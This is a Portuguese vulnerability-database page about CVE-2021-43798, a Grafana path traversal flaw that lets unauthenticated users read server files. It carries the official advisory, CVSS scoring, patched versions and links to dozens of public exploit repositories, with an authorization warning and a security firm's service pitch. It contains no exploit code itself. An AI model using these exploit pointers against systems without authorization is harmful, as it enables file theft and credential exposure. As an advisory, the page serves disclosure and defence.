← voltar
CVE-2021-43798

Grafana path traversal

CVSS 7.5 HIGHEPSS 88.8%● KEVCWE-22
Em resumo

Grafana versões 8.0-8.3 possuem uma falha que permite que atacantes acessem arquivos no servidor manipulando o caminho da URL do plugin. Isso ignora controles de acesso normais e pode expor dados sensíveis como arquivos de configuração ou credenciais.

Detalhe técnico

Vulnerabilidade de path traversal no endpoint público de plugins do Grafana permite que atacantes não autenticados leiam arquivos arbitrários através de sequências de traversal de diretório no parâmetro de ID do plugin. A vulnerabilidade afeta versões 8.0.0-beta1 até 8.3.0 (excluindo lançamentos corrigidos) e requer apenas acesso de rede ao endpoint vulnerável.

Resumo gerado e traduzido por IA a partir da descrição oficial.
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Produtos afetados
grafana · grafana
PoCs públicas encontradas53
githubgithub.com/jas502n/Grafana-CVE-2021-43798368githubgithub.com/A-D-Team/grafanaExp268githubgithub.com/pedrohavay/exploit-grafana-CVE-2021-4379846githubgithub.com/taythebot/CVE-2021-4379841githubgithub.com/zer0yu/CVE-2021-4379827githubgithub.com/Mr-xn/CVE-2021-4379824githubgithub.com/MoCh3n/CVE-2021-43798-grafana_fileread17githubgithub.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC14githubgithub.com/asaotomo/CVE-2021-43798-Grafana-Exp12githubgithub.com/Mo0ns/Grafana_POC-CVE-2021-437989githubgithub.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-437988githubgithub.com/kenuosec/grafanaExp6githubgithub.com/z3n70/CVE-2021-437985githubgithub.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT4githubgithub.com/s1gh/CVE-2021-437984githubgithub.com/hupe1980/CVE-2021-437983githubgithub.com/0xSAZZAD/Grafana-CVE-2021-437983githubgithub.com/wezoomagency/GrafXploit3githubgithub.com/Ryze-T/CVE-2021-437982githubgithub.com/fanygit/Grafana-CVE-2021-43798Exp2githubgithub.com/monke443/CVE-2021-437982githubgithub.com/lfz97/CVE-2021-43798-Grafana-File-Read1githubgithub.com/LongWayHomie/CVE-2021-437981githubgithub.com/k3rwin/CVE-2021-43798-Grafana1githubgithub.com/Jroo1053/GrafanaDirInclusion1githubgithub.com/FAOG99/GrafanaDirectoryScanner1githubgithub.com/wagneralves/CVE-2021-437981githubgithub.com/Strikoder-Premium/Grafana-Password-Decryptor1githubgithub.com/Asbawy/GrafTraverse-CVE-2021-437980githubgithub.com/katseyres2/CVE-2021-437980githubgithub.com/Iris288/CVE-2021-437980githubgithub.com/Okymi-X/CVE-2021-437980githubgithub.com/halencarjunior/grafana-CVE-2021-437980githubgithub.com/ticofookfook/CVE-2021-437980githubgithub.com/MalekAlthubiany/CVE-2021-437980githubgithub.com/gixxyboy/CVE-2021-437980githubgithub.com/hxlxmj/Grafxploit0githubgithub.com/G01d3nW01f/CVE-2021-437980githubgithub.com/mauricelambert/LabAutomationCVE-2021-437980githubgithub.com/victorhorowitz/grafana-exploit-CVE-2021-437980githubgithub.com/JiuBanSec/Grafana-CVE-2021-437980githubgithub.com/davidrxchester/Grafana-8.3-Directory-Traversal0githubgithub.com/ravi5hanka/CVE-2021-43798-Exploit-for-Windows-and-Linux0githubgithub.com/suljov/Grafana-LFI-exploit0githubgithub.com/abuyazeen/CVE-2021-43798-Grafana-path-traversal-tester0githubgithub.com/0xf3d0rq/CVE-2021-437980githubgithub.com/baktistr/cve-2021-43798-enum0githubgithub.com/notbside/CVE-2021-43798-PoC0githubgithub.com/Shoxake17/CVE-2021-437980githubgithub.com/kikechans/-Grafana-LFI-CVE-2021-437980cve_referencepacketstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.htmlnão verificadoexploitdbwww.exploit-db.com/exploits/50581não verificadocve_referencepacketstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.htmlnão verificado
⚠ Recursos públicos, para você avaliar a exposição de sistemas que controla ou está autorizado a testar. Teste apenas com autorização.

Quer saber se a sua infraestrutura está exposta a isto?

Falar com a TrueHacking →
Referências
http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.htmlhttp://packetstormsecurity.com/files/165221/Grafana-8.3.0-Directory-Traversal-Arbitrary-File-Read.htmlhttps://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545cehttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47phttps://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/https://security.netapp.com/advisory/ntap-20211229-0004/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-43798http://www.openwall.com/lists/oss-security/2021/12/09/2http://www.openwall.com/lists/oss-security/2021/12/10/4